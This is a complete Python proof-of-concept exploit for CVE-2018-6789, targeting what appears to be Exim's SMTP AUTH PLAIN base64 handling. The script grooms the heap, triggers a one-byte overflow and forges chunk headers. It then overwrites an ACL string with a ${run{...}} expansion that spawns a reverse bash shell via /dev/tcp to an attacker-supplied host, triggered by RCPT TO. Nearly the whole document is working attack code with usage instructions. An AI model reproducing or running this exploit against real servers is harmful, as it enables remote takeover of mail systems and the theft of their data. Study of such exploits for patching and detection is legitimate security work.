#!/usr/bin/python import sys import time import socket import struct s = None f = None def logo(): print print " CVE-2018-6789 Poc Exploit" print "@straight_blast ; straight426@gmail.com" print def connect(host, port): global s global f s = socket.create_connection((host,port)) f = s.makefile('rw', bufsize=0) def p(v): return struct.pack("<Q", v) def readuntil(delim='\n', debug = False): data = '' while not data.endswith(delim): data += f.read(1) if debug: print data return data def write(data): f.write(data + "\n") def ehlo(v): write("EHLO " + v) readuntil('HELP') def unrec(v): write(v) readuntil('command') def auth_plain(v,s = None): encode = v.encode('base64').replace('\n','').replace('=','') if s and len(s) > 0: encode = encode + s write("AUTH PLAIN " + encode) readuntil('data') def one_byte_overwrite(): v = "C" * 8200 encode = v.encode('base64').replace('\n','').replace('=','') encode = encode[:-1] + "PE" write("AUTH PLAIN " + encode) readuntil('data') def exploit(remote_host, remote_port, local_host, local_port): connect(remote_host, remote_port) print "[0] connected to target -> " + remote_host + ":" + str(remote_port) time.sleep(0.5) ehlo("A" * 8000) ehlo("B" * 16) print "[1] finished grooming heap with 0x6060 block space" unrec("\xff" * 2000) ehlo("D" * 8200) one_byte_overwrite() print "[2] triggerd 1 byte overwrite vulnerability to extend the chunk size from 0x2021 to 0x20f1" fake_header = p(0) fake_header += p(0x1f51) auth_plain("E" * 176 + fake_header + "E" * (8200-176-len(fake_header))) print "[3] patched following store block with fake header so extended chunk can be freed" ehlo("F" * 16) print "[4] freed extended store block" unrec("\xff" * 2000) #filler against freed block unrec("\xff" * 2000) #filler against freed block fake_header = p(0x4110) fake_header += p(0x1f50) auth_plain("G" * 176 + fake_header + "G" * (8200-176-len(fake_header))) print "[5] patched store block with fake header so extended chunk can be malloced" #acl_store_block_partial_address = "\x80\xa4\x6e" acl_store_block_partial_address = "\xe0\xc8\x6c" auth_plain("H" * 8200 + p(0x2021) + acl_store_block_partial_address, "X") print "[6] finished using extend chunk to overwrite the overlapping store block's next pointer to an acl store block address" ehlo("I" * 16) print "[7] triggered smtp_reset_3(); with EHLO" # 288 is for github build # 1000 is for debian build #acl_smtp_rcpt_offset = 288 acl_smtp_rcpt_offset = 1000-16 cmd = "/bin/bash -c \"/bin/bash -i >& /dev/tcp/" + local_address + "/" + str(local_port) + " 0>&1\"" cmd_expansion_string = "${run{" + cmd + "}}\0" auth_plain("J" * acl_smtp_rcpt_offset + cmd_expansion_string + "\0" * (8200 - acl_smtp_rcpt_offset - len(cmd_expansion_string))) print "[8] malloced acl store block and overwrite the content of acl_smtp_rcpt with shell expression" write("MAIL FROM:<straightblast426@gmail.com>") ; readuntil() write("RCPT TO:<j00_g0t@pwned.com>") print "[9] triggered RCPT TO which executes shell expression ... enjoy your shell!" print if __name__ == '__main__': logo() if len(sys.argv) < 5: print "Usage: ./exploit <remote_address> <remote_port> <local_address> <local_port>\n" exit() remote_address = sys.argv[1] remote_port = int(sys.argv[2]) local_address = sys.argv[3] local_port = int(sys.argv[4]) #print remote_address, remote_port, local_address, local_port exploit(remote_address, remote_port, local_address, local_port)